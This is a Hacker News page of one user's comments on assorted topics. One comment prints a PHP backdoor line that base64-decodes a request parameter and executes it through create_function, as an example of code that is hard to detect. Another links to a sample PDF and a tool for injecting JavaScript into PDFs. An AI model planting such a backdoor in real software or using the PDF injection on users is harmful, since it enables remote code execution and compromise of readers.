Hacker News new | past | comments | ask | show | jobs | submit | _cereal's comments login

So it seems he went farther :D


Or so they know it's still a long way.



Agree that is difficult to catch it. For the log, in this case there are both functions, the output looks something like this:

  $j6 = create_function('', base64_decode($_REQUEST['sort']));
  $j6(); // execution
The `create_function()`[1] will internally execute `eval()` so the result would be the same.

[1] http://php.net/create_function


For "known good" folder, a git repository may help, at least to restore a clean version of the code.


Probably preaching to the choir here, but for those who are unaware, be sure that .git directories are not accessible by web clients. It will lead to source code disclosure, and if you've checked in any secrets, credential exposure as well.


That and if the webserver can write to .git it can also invisibly modify the history to ensure that you continue to check out the backdoored code no matter how far you go back.


I second that.

An example: a few weeks ago I shared on my FB profile the Mozilla Foundation petition link for the EU copyright reform[1] and it was removed with this motivation:

"We removed this post because it looks like spam and doesn't follow our Community Standards."

[1] https://blog.mozilla.org/netpolicy/2018/09/07/eu-copyright-r...


It reminds me about John Cage's 4'33''

- https://en.wikipedia.org/wiki/4%E2%80%B233%E2%80%B3

- https://youtu.be/JTEFKFiXSx4

An anecdote: when my semiotics professor talked about this composition for the first time, I was recording the lecture, and when colleagues asked for a copy, I sent them only the pauses between the sentences. When art meets sarcasm, it spreads really fast.


Hmm. To me, it seems not. Or at least, it seems an everyday expertise knowledge, derived from direct experience. He does not seem to be a qualified expert. The goal here is to sell the books.


From the website:

> the purchase of the book is totally optional, so please do take the time to look around my site

Also, the book is only 13 pounds, so I don't they they are making a lot of money out of it. Perhaps they use the money to keep the website running?


Yes, I read that sentence before writing and your argument about the website expenses can be valid. It does not change my main point: when it is about health one should search for information from qualified professionals. For example:

1. https://www.anxiety.org/panic-disorder-panic-attacks

2. https://www.mayoclinic.org/diseases-conditions/panic-attacks...

A personal experience can be illuminating sometimes but it cannot be considered an alternative approach. For this reason, I do not consider it a good source. Just my opinion.


You could be right, but on the other hand many qualified professionals prescribe Zoloft or Xanax and be done with it. A personal account (which in fact many of the comments here on HN are) can be very helpful, if only as a reference when talking to real professionals.


This reminds me about the Scaly-foot gastropod[1] mollusc which "possesses a trilayered structure comprised of a mineralized iron sulfide–based outer layer (OL) containing greigite..."[2]

[1] https://en.wikipedia.org/wiki/Scaly-foot_gastropod [2] http://www.pnas.org/content/107/3/987


Hi,

apart from programming you could add a remote part-time job, look at positions available at:

https://appen.com/ or http://www.ai-media.tv/


It depends on the exploit and on the reader. If, for example, the reader supports javascript then it can be attacked, apart from other weaknesses. Chrome on Linux executes javascript in PDF, while Firefox does not.

Here is an example file: https://we.tl/q90gXERGmx

Built with https://github.com/cornerpirate/JS2PDFInjector


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: